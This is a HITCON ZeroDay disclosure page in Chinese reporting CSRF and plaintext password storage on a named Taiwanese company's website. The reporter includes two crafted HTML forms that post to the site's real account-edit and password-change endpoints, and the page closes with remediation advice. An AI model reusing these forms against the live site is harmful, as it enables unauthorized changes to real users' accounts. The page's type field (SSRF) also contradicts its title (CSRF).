Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2019-00956
- 發信 Vendor: MEC孟新電材股份有限公司
- Title: MEC孟新電材股份有限公司 CSRF, 密碼明文儲存
- Introduction: CSRF, 碼明文儲存
處理狀態
目前狀態
公開
Last Update : 2019/10/31
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2019/08/31 15:46:30 : 新提交 (由 SomeApple 更新此狀態)
- 2019/09/01 22:15:16 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/09/02 14:24:57 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/09/02 14:24:57 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/09/02 14:24:57 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/10/31 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2019-00956
- 通報者:jk82421 (SomeApple)
- 風險:低
- 類型:Server-Side Request Forgery (SSRF)
參考資料
暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.mecbiz.com.tw/account_edit1.php
http://www.mecbiz.com.tw/account_edit2.php
http://www.mecbiz.com.tw/account_edit2.php
敘述
一開始資訊為
試著構造自己的 html
<form id="reg_form" method="post" class="form2" action="http://www.mecbiz.com.tw/account_edit1.php">
<div class="asterisk word_color3">為必填</div>
<div class="form_fill">
<label class="asterisk">姓<span>名</span></label>
<input class="form-control custom-control-inline" id="reg_name" name="reg_name" type="text" placeholder="123">
</div>
<div class="form_fill">
<label class="asterisk asterisk_none">公司名稱</label>
<input class="form-control custom-control-inline" id="reg_company" name="reg_company" type="text" placeholder="123">
</div>
<div class="form_fill">
<label class="asterisk asterisk_none">手機號碼</label>
<input class="form-control custom-control-inline" id="reg_phone" name="reg_phone" type="text" placeholder="">
</div>
<div class="btn_style_box">
<button type="submit">更新</button>
<a href="account.php">
<div class="btn_style btn_style3">取消</div>
</a>
</div>
</form>接著按送出,成功更改
借下來試著改密碼,原本密碼 (明文儲存)
構造 html
<form id="reg_form" method="post" class="form2" action="http://www.mecbiz.com.tw/account_edit2.php">
<div class="asterisk word_color3">為必填</div>
<div class="form_fill old_password">
<label class="asterisk label_span_style">舊<span>密</span><span>碼</span></label>
<input class="form-control custom-control-inline" type="text" id="reg_old_pwd" name="reg_old_pwd">
</div>
<div class="form_fill">
<label class="asterisk label_span_style">新<span>密</span><span>碼</span></label>
<input class="form-control custom-control-inline" type="text" id="reg_new_pwd" name="reg_new_pwd">
<p class="word_color">※請輸入介於8-20位數之間密碼,需同時包含英文和 數字。</p>
</div>
<div class="form_fill check_new_password">
<label class="asterisk">確認新密碼</label>
<input class="form-control custom-control-inline" type="text" id="reg_new_pwd_check"
name="reg_new_pwd_check">
</div>
<div class="btn_style_box">
<button type="submit">更新</button>
<a href="account.php">
<div class="btn_style btn_style3">取消</div>
</a>
</div>
</form>成功送出,修改成功,可以看到密碼後面多一個 1
修補建議
1. 建議為每一次的 request 加上驗證用 token,以防 request 是從別人的網站來
2. 密碼不應該為明文儲存,應該用 hash 方式儲存
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。